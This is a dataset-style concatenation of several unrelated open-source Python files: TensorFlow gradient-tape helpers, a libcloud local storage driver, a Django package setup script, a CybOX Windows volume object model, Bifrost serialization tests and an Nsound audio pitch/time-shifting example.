pywrap_tfe.TFE_Py_TapeVariableAccessed(var)
pywrap_tfe.TFE_Py_VariableWatcherVariableAccessed(var)
def pop_tape(tape):
"""Pops the given tape in the stack."""
pywrap_tfe.TFE_Py_TapeSetRemove(tape._tape) # pylint: disable=protected-access
@contextlib.contextmanager
def stop_recording():
"""Stop all gradient recording (backprop and forwardprop)."""
is_stopped = pywrap_tfe.TFE_Py_TapeSetIsStopped()
try:
if not is_stopped:
pywrap_tfe.TFE_Py_TapeSetStopOnThread()
yield
finally:
if not is_stopped:
pywrap_tfe.TFE_Py_TapeSetRestartOnThread()
def should_record_backprop(tensors):
"""Returns true if any tape in the stack watches any of these tensors.
Only takes GradientTapes into account, not forward accumulators.
Args:
tensors: Tensors to check, typically inputs to an operation.
Returns:
Boolean, whether any tape watches any of `tensors`.
"""
return pywrap_tfe.TFE_Py_TapeSetShouldRecordBackprop(tensors)
def record_operation(op_type, output_tensors, input_tensors, backward_function,
forward_function=None):
"""Records the operation on all tapes in the stack."""
pywrap_tfe.TFE_Py_TapeSetRecordOperation(op_type, output_tensors,
input_tensors, backward_function,
forward_function)
def record_operation_backprop_only(op_type, output_tensors, input_tensors,
backward_function):
"""Records the operation on all backward tapes in the stack."""
pywrap_tfe.TFE_Py_TapeSetRecordOperationBackprop(op_type, output_tensors,
i | nput_tensors,
backward_function)
def record_operation_forwardprop_only(op_type, output_tensors | , input_tensors,
backward_function,
forwardprop_output_indices):
"""Records the operation on all forward accumulators in the stack.
Args:
op_type: a string for the operation type, used in the backprop code
output_tensors: a list of Python Tensor objects output by the operation
input_tensors: a list of input Tensors to the recorded operation
backward_function: the function to be called to, given the gradients of the
output tensors, produce the gradients of the input tensors. This function
is automatically transposed to produce output gradients given input
gradients.
forwardprop_output_indices: indicates any output_tensors which contain JVPs.
Typically these will have come from TFE_Py_PackForwardGradients. May be
None or an empty sequence if there are no JVP outputs from the operation.
"""
pywrap_tfe.TFE_Py_TapeSetRecordOperationForwardprop(
op_type, output_tensors, input_tensors, backward_function,
forwardprop_output_indices)
def delete_trace(tensor_id):
"""Deletes traces for this Tensor from all tapes in the stack."""
pywrap_tfe.TFE_Py_TapeSetDeleteTrace(tensor_id)
def could_possibly_record():
"""Returns True if any tape is active."""
return not pywrap_tfe.TFE_Py_TapeSetIsEmpty()
|
Jc2k/libcloud | libcloud/storage/drivers/local.py | Python | apache-2.0 | 18,796 | 0.00016 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Provides storage driver for working with local filesystem
"""
from __future__ import with_statement
import errno
import os
import shutil
import sys
try:
from lockfile import mkdirlockfile
except ImportError:
raise ImportError('Missing lockfile dependency, you can install it ' \
'using pip: pip install lockfile')
from libcloud.utils.files import read_in_chunks
from libcloud.utils.py3 import relpath
from libcloud.utils.py3 import u
from libcloud.common.base import Connection
from libcloud.storage.base import Object, Container, StorageDriver
from libcloud.common.types import LibcloudError
from libcloud.storage.types import ContainerAlreadyExistsError
from libcloud.storage.types import ContainerDoesNotExistError
from libcloud.storage.types import ContainerIsNotEmptyError
from libcloud.storage.types import ObjectError
from libcloud.storage.types import ObjectDoesNotExistError
from libcloud.storage.types import InvalidContainerNameError
IGNORE_FOLDERS = ['.lock', '.hash']
class LockLocalStorage(object):
"""
A class to help in locking a local path before being updated
"""
def __init__(self, path):
self.path = path
self.lock = mkdirlockfile.MkdirLockFile(self.path, threaded=True)
def __enter__(self):
try:
self.lock.acquire(timeout=0.1)
except lockfile.LockTimeout:
raise LibcloudError('Lock timeout')
def __exit__(self, type, value, traceback):
if self.lock.is_locked():
self.lock.release()
if value is not None:
raise value
class LocalStorageDriver(StorageDriver):
"""
Implementation of local file-system based storage. This is helpful
where the user would want to use the same code (using libcloud) and
switch between cloud storage and local storage
"""
connectionCls = Connection
name = 'Local Storage'
website = 'http://example.com'
hash_type = 'md5'
def __init__(self, key, secret=None, secure=True, host=None, port=None,
**kwargs):
# Use the key as the path to the storage
self.base_path = key
if not os.path.isdir(self.base_path):
raise LibcloudError('The base path is not a directory')
super(StorageDriver, self).__init__(key=key, secret=secret,
secure=secure, host=host,
port=port, **kwargs)
def _make_path(self, path, ignore_existing=True):
"""
Create a path by checking if it already exists
"""
try:
os.makedirs(path)
except OSError:
exp = sys.exc_info()[1]
if exp.errno == errno.EEXIST and not ignore_existing:
raise exp
def _check_container_name(self, container_name):
"""
Check if the container name is valid
@param container_name: Container name
@type container_name: C{str}
"""
if '/' in container_name or '\\' in container_name:
raise InvalidContainerNameError(value=None, driver=self,
container_name=container_name)
def _make_container(self, container_name):
"""
Create a container instance
@param container_name: Container name.
@type container_name: C{str}
@return: Container instance.
@rtype: L{Container}
"""
self._check_container_name(container_name)
full_path = os.path.join(self.base_path, container_name)
try:
stat = os.stat(full_path)
if not os.path.isdir(full_path):
raise OSError('Target path is not a directory')
except OSError:
raise ContainerDoesNotExistError(value=None, driver=self,
container_name=container_name)
extra = {}
extra['creation_time'] = stat.st_ctime
extra['access_time'] = stat.st_atime
extra['modify_time'] = stat.st_mtime
return Container(name=container_name, extra=extra, driver=self)
def _make_object(self, container, object_name):
"""
Create an object instance
@param container: Container.
@type container: L{Container}
@param object_name: Object name.
@type object_name: C{str}
@return: Object instance.
@rtype: L{Object}
"""
full_path = os.path.join(self.base_path, container.name, object_name)
if os.path.isdir(full_path):
raise ObjectError(value=None, driver=self, object_name=object_name)
try:
stat = os.stat(full_path)
except Exception:
raise ObjectDoesNotExistError(value=None, driver=self,
object_name=object_name)
# Make a hash for the file based on the metadata. We can safely
# use only the mtime attribute here. If the file contents change,
# the underlying file-system will change mtime
data_hash = self._get_hash_function()
data_hash.update(u(stat.st_mtime).encode('ascii'))
data_hash = data_hash.hexdigest()
extra = {}
extra['creation_time'] = stat.st_ctime
extra['access_time'] = stat.st_atime
extra['modify_time'] = stat.st_mtime
return Object(name=object_name, size=stat.st_size, extra=extra,
driver=self, container=container, hash=data_hash,
meta_data=None)
def iterate_containers(self):
"""
Return a generator of containers.
@return: A generator of Contai | ner instances.
@rtype: C{generator} of L{Contain | er}
"""
for container_name in os.listdir(self.base_path):
full_path = os.path.join(self.base_path, container_name)
if not os.path.isdir(full_path):
continue
yield self._make_container(container_name)
def _get_objects(self, container):
"""
Recursively iterate through the file-system and return the object names
"""
cpath = self.get_container_cdn_url(container, check=True)
for folder, subfolders, files in os.walk(cpath, topdown=True):
# Remove unwanted subfolders
for subf in IGNORE_FOLDERS:
if subf in subfolders:
subfolders.remove(subf)
for name in files:
full_path = os.path.join(folder, name)
object_name = relpath(full_path, start=cpath)
yield self._make_object(container, object_name)
def iterate_container_objects(self, container):
"""
Returns a generator of objects for the given container.
@param container: Container instance
@type container: L{Container}
@return: A generator of Object instances.
@rtype: C{generator} of L{Object}
"""
return self._get_objects(container)
def get_container(self, container_name):
"""
Return a container instance.
@param container_name: Container name.
@type container_name: C{str}
@return: L{Container} instance.
@rtype: L{Container}
"""
return self._make_container(container_name)
def get_container_cdn_url(s |
ramusus/django-vkontakte-groups-statistic | setup.py | Python | bsd-3-clause | 1,127 | 0.000887 | from setuptools import setup, find_packages
setup(
name='django-vkontakte-groups-statistic',
version=__import__('vkontakte_groups_statistic').__version__,
description='Django implementation for vkontakte API Groups Statistic',
long_description=open('README.md').read(),
author='ramusus',
author_email='ramusus@gmail.com',
url='https://github.com/ramusus/django-vkontakte-groups-statistic',
download_url='http://pypi.python.org/pypi/django-vkontakte-groups-statistic',
license='BSD',
packages=find_packages(),
include_package_data=True,
zip_safe=False, # because we're including media that | Django needs
install_requires=[
'django-vkontakte-api>=0.4.2',
'django-vkontakte-groups>=0.3.5',
],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers', |
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
CybOXProject/python-cybox | cybox/objects/win_volume_object.py | Python | bsd-3-clause | 1,947 | 0.001027 | # Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
from mixbox import entities, fields
import cybox.bindings.win_volume_object as win_volume_binding
from cybox.objects.volume_object import Volume
from cybox.common import BaseProperty, String
class WindowsDrive(BaseProperty):
| _binding = win_volume_binding
_binding_class = win_volume_binding.WindowsDriveType
_namespace = "http://cybox.mitre.org/objects#WinVolumeObject | -2"
TYPE_DRIVE_UNKNOWN = "DRIVE_UNKNOWN"
TYPE_DRIVE_NO_ROOT_DIR = "DRIVE_NO_ROOT_DIR"
TYPE_DRIVE_REMOVABLE = "DRIVE_REMOVABLE"
TYPE_DRIVE_FIXED = "DRIVE_FIXED"
TYPE_DRIVE_REMOTE = "DRIVE_REMOTE"
TYPE_DRIVE_CDROM = "DRIVE_CDROM"
TYPE_DRIVE_RAMDISK = "DRIVE_RAMDISK"
class WindowsVolumeAttribute(BaseProperty):
_binding = win_volume_binding
_binding_class = win_volume_binding.WindowsVolumeAttributeType
_namespace = "http://cybox.mitre.org/objects#WinVolumeObject-2"
TYPE_READ_ONLY = "ReadOnly"
TYPE_HIDDEN = "Hidden"
TYPE_NO_DEFAULT_DRIVE_LETTER = "NoDefaultDriveLetter"
TYPE_SHADOW_COPY = "ShadowCopy"
class WindowsVolumeAttributesList(entities.EntityList):
_binding = win_volume_binding
_binding_class = win_volume_binding.WindowsVolumeAttributesListType
_namespace = "http://cybox.mitre.org/objects#WinVolumeObject-2"
attribute = fields.TypedField("Attribute", WindowsVolumeAttribute, multiple=True)
class WinVolume(Volume):
_binding = win_volume_binding
_binding_class = win_volume_binding.WindowsVolumeObjectType
_namespace = "http://cybox.mitre.org/objects#WinVolumeObject-2"
_XSI_NS = "WinVolumeObj"
_XSI_TYPE = "WindowsVolumeObjectType"
attributes_list = fields.TypedField("Attributes_List", WindowsVolumeAttributesList)
drive_letter = fields.TypedField("Drive_Letter", String)
drive_type = fields.TypedField("Drive_Type", WindowsDrive)
|
ledatelescope/bifrost | test/test_serialize.py | Python | bsd-3-clause | 9,648 | 0.001658 |
# Copyright (c) 2016-2020, The Bifrost Authors. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Bifrost Authors nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# TODO: Add tests for data streams spanning multiple files
import unittest
import bifrost as bf
from bifrost.blocks import *
import os
import shutil
class TemporaryDirectory(object):
def __init__(self, path):
self.path = path
os.makedirs(self.path)
def remove(self):
shutil.rmtree(self.path)
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self.remove()
def get_sigproc_file_size(filename):
"""Returns the header and data size of a sigproc file without reading
the whole file.
"""
with open(filename, 'rb') as f:
head = ''
while 'HEADER_END' not in head:
more_data = f.read(4096)
try:
more_data = more_data.decode(errors='replace')
except AttributeError:
# Python2 catch
pass
if len(more_data) == 0:
raise IOError("Not a valid sigproc file: " + filename)
head += more_data
hdr_size = head.find('HEADER_END') + len('HEADER_END')
file_size = os.path.getsize(filename)
data_size = file_size - hdr_size
return hdr_size, data_size
def rename_sequence(hdr, name):
hdr['name'] = name
return hdr
def rename_sequence(hdr, name):
hdr['name'] = name
return hdr
class SerializeTest(unittest.TestCase):
def setUp(self):
self.fil_file = "./data/2chan16bitNoDM.fil"
# Note: This is specific to 2chan16bitNoDM.fil
self.time_tag = 3493024746386227200
hdr_size, self.data_size = get_sigproc_file_size(self.fil_file)
with open(self.fil_file, 'rb') as f:
self.data = f.read()
self.data = self.data[hdr_size:]
self.temp_path = '/tmp/bifrost_test_serialize'
self.basename = os.path.basename(self.fil_file)
self.basepath = os.path.join(self.temp_path, self.basename)
self.gulp_nframe = 101
def run_test_serialize_with_name_no_ringlets(self, gulp_nframe_inc=0):
with bf.Pipeline() as pipeline:
data = read_sigproc([self.fil_file], self.gulp_nframe, core=0)
for i in range(5):
if gulp_nframe_inc != 0:
data = copy(data,
gulp_nframe=self.gulp_nframe+i*gulp_nframe_inc)
else:
data = copy(data)
data = serialize(data, self.temp_path, core=0)
with TemporaryDirectory(self.temp_path):
pipeline.run()
# Note: SerializeBlock uses os.path.basename if path is given
hdrpath = self.basepath + '.bf.json'
datpath = self.basepath + '.bf.' + '0' * 12 + '.dat'
self.assertTrue(os.path.exists(hdrpath))
self.assertTrue(os.path.exists(datpath))
self.assertEqual(os.path.getsize(datpath), self.data_size)
with open(datpath, 'rb') as f:
data = f.read()
self.assertEqual(data, self.data)
def test_serialize_with_name_no_ringlets(self):
self.run_test_serialize_with_name_no_ringlets()
self.run_test_serialize_with_name_no_ringlets(gulp_nfram | e_inc=1)
self.run_test_serialize_with_name_no_ringlets(gulp_nframe_inc=3)
def test_serialize_with_time_tag_no_ringlets(self):
with bf.Pipeline() as pipeline:
data = read_sigproc([self.fil_file], self.gulp_nframe)
# Custom view sets sequence name to '', which causes SerializeBlock
# to use the time_tag instead.
data = bf.views.custom(data, lambda hdr: rename_sequence(hdr, ''))
data = serialize(da | ta, self.temp_path)
with TemporaryDirectory(self.temp_path):
pipeline.run()
basepath = os.path.join(self.temp_path,
'%020i' % self.time_tag)
hdrpath = basepath + '.bf.json'
datpath = basepath + '.bf.' + '0' * 12 + '.dat'
self.assertTrue(os.path.exists(hdrpath))
self.assertTrue(os.path.exists(datpath))
self.assertEqual(os.path.getsize(datpath), self.data_size)
with open(datpath, 'rb') as f:
data = f.read()
self.assertEqual(data, self.data)
def test_serialize_with_name_and_ringlets(self):
with bf.Pipeline() as pipeline:
data = read_sigproc([self.fil_file], self.gulp_nframe)
# Transpose so that freq becomes a ringlet dimension
# TODO: Test multiple ringlet dimensions (e.g., freq + pol) once
# SerializeBlock supports it.
data = transpose(data, ['freq', 'time', 'pol'])
data = serialize(data, self.temp_path)
with TemporaryDirectory(self.temp_path):
pipeline.run()
# Note: SerializeBlock uses os.path.basename if path is given
hdrpath = self.basepath + '.bf.json'
datpath0 = self.basepath + '.bf.' + '0' * 12 + '.0.dat'
datpath1 = self.basepath + '.bf.' + '0' * 12 + '.1.dat'
self.assertTrue(os.path.exists(hdrpath))
self.assertTrue(os.path.exists(datpath0))
self.assertTrue(os.path.exists(datpath1))
self.assertEqual(os.path.getsize(datpath0),
self.data_size // 2)
self.assertEqual(os.path.getsize(datpath1),
self.data_size // 2)
def test_deserialize_no_ringlets(self):
with TemporaryDirectory(self.temp_path):
with bf.Pipeline() as pipeline:
data = read_sigproc([self.fil_file], self.gulp_nframe)
serialize(data, self.temp_path)
pipeline.run()
datpath = self.basepath + '.bf.' + '0' * 12 + '.dat'
with bf.Pipeline() as pipeline:
data = deserialize([self.basepath + '.bf'], self.gulp_nframe)
# Note: Must rename the sequence to avoid overwriting the input
# file.
data = bf.views.custom(
data, lambda hdr: rename_sequence(hdr, hdr['name'] + '.2'))
serialize(data, self.temp_path)
pipeline.run()
datpath = self.basepath + '.2.bf.' + '0' * 12 + '.dat'
with open(datpath, 'rb') as f:
data = f.read()
self.assertEqual(len(data), len(self.data))
self.assertEqual(data, sel |
weegreenblobbie/nsound | src/examples/stretcher.py | Python | gpl-2.0 | 1,481 | 0.00135 | ###############################################################################
#
# $Id: stretcher.py 585 2010-12-15 05:21:28Z weegreenblobbie $
#
###############################################################################
from Nsound import *
# Read in the wavefile.
a1 = AudioStream("Temperature_in.wav")
# Grab sample rate.
sr = a1.getSampleRate()
# Grab the duration in seconds.
duration = a1.getDuration()
# Create a Gaussian curve for pitch/time shifting.
sin = Sine(sr)
bend = Buffer()
bend << sin.drawFatGaussian(duration, 0.15) + 1.0
# Create a Stretcher instance
stretch = Stretcher(sr, 0.08, 0.25)
# Print progress to command line.
stretch.showP | rogress(True)
print("Pitch Shifting Up")
# Create new output AudioStream.
out = AudioStream(sr, 2)
# Pitch shift the input AudioStream.
out << stretch.pitchShift(a1, bend)
out >> "Temperature_Pitch_Shifted_Up.wav"
print("Time Shifting Faster")
# Time shift input AudioStream
out = AudioStream(sr,2)
out << stretch.timeShift(a1, 1.0 / bend)
out >> "Temper | ature_Time_Shifted_Faster.wav"
bend = Buffer()
bend << 1.0 - 0.25 * sin.drawFatGaussian(duration, 0.15)
print("Pitch Shifting Down")
out = AudioStream(sr, 2)
out << stretch.pitchShift(a1, bend)
out >> "Temperature_Pitch_Shifted_Down.wav"
print("Time Shifting Slower")
bend = Buffer()
bend << 1.0 + 0.75 * sin.drawFatGaussian(duration, 0.15)
out = AudioStream(sr, 2)
out << stretch.timeShift(a1, bend)
out >> "Temperature_Time_Shifted_Slower.wav"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.